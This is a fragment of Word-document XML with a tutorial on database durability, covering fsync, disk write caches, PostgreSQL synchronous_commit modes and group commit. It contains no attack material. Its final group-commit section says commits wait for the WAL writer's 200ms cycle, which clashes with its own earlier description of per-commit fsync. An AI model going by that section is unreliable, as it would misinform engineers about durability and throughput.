    <w:p w14:paraId="348CCD43" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Durability means: </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>once COMMIT returns success to the client, that transaction's effects are permanent — no subsequent failure (crash, power loss, disk error) can undo them.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t> This is a stronger guarantee than it sounds: it must hold even if the database process crashes immediately after sending the success acknowledgment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AB473A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD84546" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>The durability moment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE67A06" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="60E43216" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Client:    COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D626437" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Database:  (1) Write COMMIT record to WAL buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AB4CE0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">           (2) fsync(WAL file) ← this is the durability boundary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B0FE5F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">           (3) Return success to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B69E9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BB02F6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>After step (2): even if database crashes at step (3) or any later point,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586D5FBF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                recovery will find the COMMIT record in WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FF0E0E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                and complete the transaction's effects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CB2FF7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="5AFBDA64" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Before step (2): crash loses the COMMIT record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF608FF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                 recovery treats the transaction as in-progress → rolls it back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC3C9DF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                 client receives no response (connection died)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4124426F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27156EAC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>The client's perspective:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4387DC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  If client received success: transaction is durable (will survive any crash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BFF8C9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  If client received error: transaction was aborted (no effects remain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B80637" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  If client received no response (connection died): UNKNOWN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED36BF5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    → Client must query to determine if transaction committed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE17922" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    → Or use idempotency key to safely retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F0F31B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fsync requirement — the physical basis of durability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB2010" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF9C3B5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Memory hierarchy and volatility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D5AB94" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="742428C6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>CPU registers:     volatile, lost on power loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3D363B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>L1/L2/L3 cache:   volatile, lost on power loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09564A7B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>RAM (DRAM):        volatile, lost on power loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E740A61" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Write cache (disk controller): volatile without battery backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BEFFD5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>SSD NAND flash:    non-volatile, survives power loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E696AFE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>HDD magnetic disk: non-volatile, survives power loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3A593A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="727E06CB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>For durability: data must reach non-volatile storage BEFORE acknowledging COMMIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D79C58" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="5595CCE2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>fsync() system call:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE1F009" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Forces kernel to flush OS page cache to storage device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC285B9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Returns only when storage confirms data is persistent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D90FF2B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9A034A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  OS page cache: data written here is volatile (in RAM, will be lost on crash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357D12AA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  fsync: pushes data from page cache → storage device internal buffer → platter/NAND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A41C300" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E2962A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Disk write cache (disk controller has internal RAM buffer):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA7A7D0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Without battery (non-volatile) backup: disk write cache is volatile!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDDDF9C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Data in disk's internal buffer: lost on power failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D81FB1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C448FBC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Without FSU (Flush Storage Unit / BBU):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4AEF40" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Disk may acknowledge write before data is on platter/NAND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC91676" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Power failure → data in disk buffer lost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536F66C9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      fsync returns success but data isn't actually durable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C71684" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B7BC91" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC9CED6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Battery-backed disk controller: maintains power for long enough to flush buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F109825" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      NVMe with capacitor: flash memory subsystem has capacitor for in-flight writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA9AA51" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      AWS EBS/cloud SSDs: storage system handles this (you don't control hardware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F7CE53" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B32B62" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  PostgreSQL and fsync:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E941149" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    synchronous_commit = on (default):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116810B0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Every COMMIT: fsync(WAL file) → durable → success returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6054EA74" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Latency: +1-5ms (NVMe fsync: ~0.1ms, SATA SSD: ~1ms, HDD: ~5ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B35F06" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60513ED2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    synchronous_commit = off:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E3EFBB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      COMMIT: write WAL to page cache → success returned (NO fsync)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E70B2EC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Background WAL writer: fsyncs WAL every wal_writer_delay=200ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748CE757" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C93EC1D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Risk window: last 200ms of committed transactions lost on crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D609F3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      (transactions are acknowledged to client but WAL not yet on disk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B487AF4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A1CE04" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      When acceptable: non-critical data, high write throughput needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28692E2B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Not acceptable: financial transactions, audit logs, anything requiring durability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661D02BB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FEBB58" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    synchronous_commit = remote_write:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2465D8AA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      COMMIT waits for WAL to be written to replica's OS buffer (not fsynced there)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7235C65A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Protects against: primary failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14075E50" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Does not protect against: replica OS crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B9E106" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFAABB2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    synchronous_commit = remote_apply:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D99CA12" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      COMMIT waits for replica to apply WAL (not just receive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE9D87F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Slowest but strongest: primary + replica failure still safe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492376AC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708C8C1C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  The group commit optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE7F007" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Problem: each individual COMMIT → fsync → 5ms for HDD = 200 TPS maximum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF01F14" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Solution: batch multiple commits → single fsync → many commits per fsync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE4F046" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E27522" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    PostgreSQL group commit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB49309" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      WAL writer: asynchronously fsyncs WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19799983" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Transactions: wait for next WAL writer cycle (wal_writer_delay=200ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6902F6E0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Multiple transactions accumulate → single fsync acknowledges all of them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C5E9BC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A49C87" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      At 200ms intervals: potentially hundreds of transactions per fsync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1615A89C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      HDD: 5 fsyncs/second × 200 transactions/fsync = 1000 TPS (vs 200 without group commit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F219AD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      NVMe: 10,000 fsyncs/second × batch → effectively unlimited by fsync overhead</w:t>
      </w:r>
    </w:p>
